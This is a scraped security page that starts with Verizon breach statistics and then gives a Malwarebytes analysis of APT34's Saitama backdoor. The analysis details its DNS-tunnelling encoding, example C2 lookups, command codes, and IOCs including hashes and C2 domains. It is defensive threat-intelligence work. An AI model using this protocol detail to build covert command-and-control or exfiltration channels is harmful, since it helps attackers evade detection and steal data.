The system intrusions in Verizon's dataset primarily targeted manufacturing (14.4%) and public-sector (13.9%) organizations. For Web applications, manufacturing remained the primary target, at 16.1%, and financial services was the second most popular target, at 15.8%. The list looks different for social engineering, where retail organizations (16.6%) were the most common target, followed by professional (13.8) organizations. 

While most breaches were the result of attacks by external adversaries, 14% of breaches were due to errors such as misconfigured cloud storage and exposed cloud servers. People are fallible – and it’s not just about configuration errors, as the report notes that 82% of breaches involved the human element. “Whether it is the use of stolen credentials, phishing, misuse, or simply an error, people continue to play a very large role in incidents and breaches alike,” researchers wrote.

Most Common Threats in DBIR

A walkthrough of one of the stealthy communication techniques employed in a recent attack using APT34's Saitama backdoor. 
The post How the Saitama backdoor uses DNS tunnelling appeared first on Malwarebytes Labs.

_Thanks to the Malwarebytes Threat Intelligence Team for the information they provided for this article._

Understandably, a lot of cybersecurity research and commentary focuses on the act of breaking into computers undetected. But threat actors are often just as concerned with the act of breaking _out_ of computers undetected too.

Malware with the intent of surveillance or espionage needs to operate undetected, but the chances are it also needs to exfiltrate data or exchange messages with its command and control infrastructure, both of which could reveal its presence to threat hunters.

One of the stealthy communication techniques employed by malware trying to avoid detection is DNS Tunnelling, which hides messages inside ordinary-looking DNS requests.

The Malwarebytes Threat Intelligence team recently published research about an attack on the Jordanian government by the Iranian Advanced Persistent Threat (APT) group APT34 that used its own innovative version of this method.

The payload in the attack was a backdoor called Saitama, a finite state machine that used DNS to communicate. Our original article provides an educational deep dive into the operation of Saitama and is well worth a read.

Here we will expand on the tricks that Saitama used to keep its DNS tunelling hidden.

**Saitama’s DNS tunnelling**

DNS is the Internet’s “address book” that allows computers to lookup human-readable domain names, like malwarebytes.com, and find their IP addresses, like 54.192.137.126.

DNS information isn’t held in a single database. Instead it’s distributed, and each domain has name servers that are responsible for answering questions about them. Threat actors can use DNS to communicate by having their malware make DNS lookups that are answered by name servers they control.

DNS is so important it’s almost never blocked by corporate firewalls, and the enormous volume of DNS traffic on corporate networks provides plenty of cover for malicious communication.

Saitama’s messages are shaped by two important concerns: DNS traffic is still largely unencrypted, so messages have to be obscured so their purpose isn’t obvious; and DNS records are often cached heavily, so identical messages have to look different to reach the APT-controlled name servers.

**Saitama’s messages**

In the attack on the Jordanian foreign ministry, Saitama’s domain lookups used the following syntax:

domain = **message**, **counter** '.' **root domain**

The root domain is always one of uber-asia.com, asiaworldremit.com or joexpediagroup.com, which are used interchangeably.

The sub-domain portion of each lookup consists of a message followed by a counter. The counter is used to encode the message, and is sent to the command and control (C2) server with each lookup so the C2 can decode the message.

Four types of message can be sent:

**1\. Make contact**

The first time it is executed, Saitama starts its counter by choosing a random number between 0 and 46655. In this example our randomly-generated counter is 7805.

The DNS lookup derived from that counter is:

**nbn4vxanrj.joexpediagroup.com**

The counter itself is encoded using a hard-coded base36 alphabet that is shared by the name server. In base36 each digit is represented by one of the 36 characters 0-9 and A-Z. In the standard base36, alphabet 7805 is written 60t (6 x 1296 + 0 x 36 + 30 x 1). However, in Saitama’s custom alphabet 7805 is **nrj**.

The counter is also used to generate a custom alphabet that will be used to encode the message using a simple substitution. The first message sent home is the command 0, base36-encoded to a, which tells the server it has a new victim, prepended to the string haruto, making aharuto.

A simple substitution using the alphabet generated by the counter yields the message **nbn4vxa**.

**a** b c d e f g **h** i j k l m n **o** p q **r** s **t u** v w x y z 0 1 2 3 4 5 6 7 8 9
↓             ↓             ↓     ↓   ↓ ↓             
**n** j 1 6 9 k p **b** h d 0 7 y i **a** 2 g **4** u **x** **v** 3 e s w f 5 8 r o c q t l z m

The C2 name server decodes the counter using the shared, hard-coded alphabet, and then uses the counter to derive the alphabet used to encode aharuto.

It responds to the contact request with an IP address that contains an ID for Saitama to use in future communications. The first three octets can be anything, and Saitama ignores them. The final octet contains the ID. In our example we will use the ID 203:

75.99.87.**203**

**2\. Ask for a command**

Now that it has an ID from the C2 server, Saitama increments its counter to 7806 and signals its readiness to receive a command as follows: The counter is used to generate a new custom alaphabet, which encodes the ID, 203, as **ao**. The counter itself is encoded using the malware’s hard-coded base36 alphabet, to **nrc**, and one of Saitama’s three root domains is chosen at random, resulting in:

**aonrc.uber-asia.com**

The C2 server responds to the request with the size of the payload Saitama should expect. Saitama will use this to determine how many requests it will need to make to retrieve the full payload.

The first octet of the IP address the C2 responds with is any number between 129 and 255, while the second, third and fourth octets signify the first, second, and third bytes of the size of the payload. In this case the payload will be four bytes.

129.**0**.**0**.**4**

**3\. Get a command**

Now that it knows the size of the payload it will receive, Saitama makes one or more RECEIVE requests to the server to get its instructions. It increments its counter by one each time, starting at 7807. Multiple requests may be necessary in this step because some command names require more than the four bytes of information an IP address can carry. In this case it has been told to retrieve four bytes of information so it will only need to make one request.

The message from Saitama consists of three parts: The digit 2, indicating the RECEIVE command; the ID 203; and an offset indicating which part of the payload is required. These are individually base36-encoded and concatenated together. The resulting string is encoded using a custom base36 alphabet derived from the counter 7807, giving us the message **k7myyy**.

The counter is encoded using the hard-coded alphabet to **nr6**, and one of Saitama’s three root domains is chosen at random, giving us:

**k7myyynr6.asiaworldremit.com**

The C2 indicates which function it wants to run using two-digit integers. It can ask Saitama to run any of five different functions:

C2

Saitama

43

Static

70

Cmd

71

CompressedCmd

95

File

96

CompressedFile

Saitama functions

In this case the C2 wants to run the command ver using Saitama’s Cmd function. (In the previous request the C2 indicated that it would be sending Saitama a four byte payload: One byte for 70, and three bytes for ver.)

In its response, the C2 uses the first octet of the IP address to indicate the function it wants to run, 70, and then the remaining three octets to spell out the command name ver using the ASCII codepoints for the lowercase characters “v”, “e”, and “r”:

**70**.**118**.**101**.**114**

**4\. Run the command**

Saitama runs the command it has been given and sends the resulting output to the C2 server in one or more DNS requests. The counter is incremented by one each time, starting at 7808 in our example. Multiple requests may be necessary in this step because some command names require more than the four bytes an IP address can carry.

**p6yqqqqp0b67gcj5c2r3gn3l9epztnrb.asiaworldremit.com**

The counter is encoded using the hard-coded alphabet to **nrb**, and one of Saitama’s three root domains is chosen at random.

In this case the message consists of five parts: The digit 2, indicating the RECEIVE command; the ID 203; and an offset indicating which part of the response is being sent; the size of the buffer; and a twelve-byte chunk of the output. These are individually base36-encoded and concatenated together. The resulting string is encoded using a custom base36 alphabet derived from the counter 7808, giving us the message **p6yqqqqp0b67gcj5c2r3gn3l9epzt**.

**Detection**

Malwarebytes customers are protected from this attack via our Anti-Exploit layer. To learn more about the recent attack involving Saitama, read APT34 targets Jordan Government using new Saitama backdoor.

**IOCs******Maldoc****

Confirmation Receive Document.xls  
26884f872f4fae13da21fa2a24c24e963ee1eb66da47e270246d6d9dc7204c2b

**Saitama backdoor**

update.exe  
e0872958b8d3824089e5e1cfab03d9d98d22b9bcb294463818d721380075a52d

**C2s**

uber-asia.com  
asiaworldremit.com  
joexpediagroup.com

Tag

#backdoor